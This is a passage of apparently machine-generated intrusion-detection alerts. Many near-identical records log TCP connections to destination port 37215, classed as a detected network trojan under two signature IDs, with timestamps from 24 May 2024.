              SID:2835222
              Source Port:46484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542211
              SID:2835222
              Source Port:52732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490949
              SID:2829579
              Source Port:42982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313700
              SID:2829579
              Source Port:37136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210223
              SID:2835222
              Source Port:38918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332259
              SID:2835222
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371949
              SID:2829579
              Source Port:35856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234461
              SID:2835222
              Source Port:58200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544322
              SID:2835222
              Source Port:40538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.584816
              SID:2829579
              Source Port:40790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982232
              SID:2835222
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187992
              SID:2829579
              Source Port:42064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727003
              SID:2835222
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738888
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278013
              SID:2829579
              Source Port:51848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835108
              SID:2829579
              Source Port:38830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833682
              SID:2835222
              Source Port:55524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394945
              SID:2835222
              Source Port:58830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398270
              SID:2829579
              Source Port:37662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724489
              SID:2835222
              Source Port:42096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575342
              SID:2829579
              Source Port:40274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535546
              SID:2829579
              Source Port:53082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116702
              SID:2829579
              Source Port:54864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857744
              SID:2829579
              Source Port:42100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749304
              SID:2829579
              Source Port:41686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313598
              SID:2829579
              Source Port:47364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578008
              SID:2829579
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552747
              SID:2835222
              Source Port:41790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692328
              SID:2829579
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117355
              SID:2829579
              Source Port:55962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451080
              SID:2829579
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920273
              SID:2829579
              Source Port:58822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060870
              SID:2829579
              Source Port:38726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443568
              SID:2835222
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535210
              SID:2829579
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156446
              SID:2829579
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504583
              SID:2835222
              Source Port:50076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926459
              SID:2829579
              Source Port:38552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536012
              SID:2829579
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707771
              SID:2829579
              Source Port:42948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358470
              SID:2829579
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148735
              SID:2829579
              Source Port:36682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278324
              SID:2835222
              Source Port:39898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865497
              SID:2829579
              Source Port:54146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576474
              SID:2829579
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487342
              SID:2835222
              Source Port:52426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522331
              SID:2835222
              Source Port:59198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858320
              SID:2835222
              Source Port:54728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205134
              SID:2835222
              Source Port:43024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099882
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724322
              SID:2829579
              Source Port:34706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455320
              SID:2835222
              Source Port:54222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040411
              SID:2829579
              Source Port:58766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230888
              SID:2835222
              Source Port:47594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402714
              SID:2829579
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858368
              SID:2829579
              Source Port:60194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055354
              SID:2835222
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572384
              SID:2829579
              Source Port:33100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2829579
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456836
              SID:2829579
              Source Port:37544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551762
              SID:2829579
              Source Port:54036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749698
              SID:2829579
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663502
              SID:2835222
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329560
              SID:2835222
              Source Port:54572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127218
              SID:2829579
              Source Port:38708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482098
              SID:2829579
              Source Port:43628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070062
              SID:2835222
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334277
              SID:2835222
              Source Port:59858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661319
              SID:2829579
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493086
              SID:2829579
              Source Port:51690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605704
              SID:2835222
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724628
              SID:2835222
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623438
              SID:2829579
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764475
              SID:2835222
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053807
              SID:2835222
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519619
              SID:2829579
              Source Port:52502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982399
              SID:2835222
              Source Port:42472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.876048
              SID:2829579
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109318
              SID:2829579
              Source Port:37094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103021
              SID:2835222
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802767
              SID:2829579
              Source Port:33714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402777
              SID:2829579
              Source Port:44798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124822
              SID:2835222
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279692
              SID:2835222
              Source Port:60276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049295
              SID:2835222
              Source Port:53744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157665
              SID:2829579
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076844
              SID:2835222
              Source Port:60372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530879
              SID:2829579
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096730
              SID:2829579
              Source Port:49192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519604
              SID:2829579
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584811
              SID:2829579
              Source Port:39224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868004
              SID:2835222
              Source Port:38258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280981
              SID:2835222
              Source Port:50332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874758
              SID:2835222
              Source Port:34986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923213
              SID:2829579
              Source Port:59710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391652
              SID:2829579
              Source Port:57706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576492
              SID:2835222
              Source Port:46366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045001
              SID:2835222
              Source Port:57906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071028
              SID:2835222
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100541
              SID:2829579
              Source Port:53818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980872
              SID:2829579
              Source Port:42376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707121
              SID:2835222
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435323
              SID:2829579
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2835222
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164542
              SID:2835222
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923645
              SID:2835222
              Source Port:53306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200780
              SID:2829579
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303174
              SID:2835222
              Source Port:49294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313638
              SID:2829579
              Source Port:46260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121375
              SID:2835222
              Source Port:58816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409239
              SID:2829579
              Source Port:49648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246329
              SID:2835222
              Source Port:39798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408170
              SID:2829579
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875714
              SID:2835222
              Source Port:47618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516262
              SID:2829579
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210208
              SID:2829579
              Source Port:58836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857828
              SID:2829579
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857848
              SID:2829579
              Source Port:54896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186198
              SID:2829579
              Source Port:50648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365160
              SID:2829579
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493082
              SID:2835222
              Source Port:37008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118944
              SID:2829579
              Source Port:37374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057480
              SID:2835222
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098289
              SID:2835222
              Source Port:59964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481991
              SID:2829579
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451303
              SID:2835222
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045171
              SID:2835222
              Source Port:51742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483697
              SID:2829579
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432239
              SID:2835222
              Source Port:36666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113460
              SID:2835222
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495237
              SID:2835222
              Source Port:56348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230841
              SID:2835222
              Source Port:45008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118191
              SID:2829579
              Source Port:57308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536601
              SID:2829579
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539999
              SID:2829579
              Source Port:50526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060972
              SID:2829579
              Source Port:51084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049923
              SID:2835222
              Source Port:37826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396727
              SID:2835222
              Source Port:43820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368705
              SID:2829579
              Source Port:51818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040650
              SID:2835222
              Source Port:37068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303204
              SID:2835222
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598010
              SID:2829579
              Source Port:55660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278078
              SID:2835222
              Source Port:34420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429775
              SID:2835222
              Source Port:52614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125446
              SID:2829579
              Source Port:36662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066200
              SID:2829579
              Source Port:56860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492398
              SID:2835222
              Source Port:59754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492287
              SID:2835222
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924220
              SID:2835222
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449251
              SID:2835222
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873784
              SID:2835222
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535980
              SID:2835222
              Source Port:43404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397207
              SID:2829579
              Source Port:38112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241991
              SID:2835222
              Source Port:58150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303373
              SID:2829579
              Source Port:37862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249756
              SID:2835222
              Source Port:49896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515555
              SID:2835222
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050048
              SID:2835222
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433664
              SID:2829579
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575094
              SID:2829579
              Source Port:50188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525319
              SID:2835222
              Source Port:48124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111870
              SID:2829579
              Source Port:33874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433501
              SID:2829579
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449206
              SID:2835222
              Source Port:46556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2829579
              Source Port:36518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098237
              SID:2835222
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576406
              SID:2829579
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040856
              SID:2835222
              Source Port:47542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801474
              SID:2835222
              Source Port:41370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502887
              SID:2829579
              Source Port:33446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535264
              SID:2835222
              Source Port:34900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570673
              SID:2835222
              Source Port:53400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187993
              SID:2829579
              Source Port:38974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538684
              SID:2835222
              Source Port:55488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451162
              SID:2835222
              Source Port:49510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575251
              SID:2829579
              Source Port:49988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433686
              SID:2829579
              Source Port:39770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696065
              SID:2835222
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398240
              SID:2835222
              Source Port:60716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457723
              SID:2829579
              Source Port:45192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536902
              SID:2835222
              Source Port:58050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573196
              SID:2829579
              Source Port:56178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233915
              SID:2835222
              Source Port:49948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506745
              SID:2829579
              Source Port:38952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254262
              SID:2829579
              Source Port:55134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114679
              SID:2829579
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522292
              SID:2835222
              Source Port:41158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061576
              SID:2835222
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568687
              SID:2835222
              Source Port:59722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575124
              SID:2829579
              Source Port:48338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634126
              SID:2829579
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431394
              SID:2829579
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188102
              SID:2835222
              Source Port:54600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554347
              SID:2835222
              Source Port:57158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332354
              SID:2829579
              Source Port:49690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478245
              SID:2835222
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391626
              SID:2829579
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574107
              SID:2835222
              Source Port:38352
              Destination Port:37215
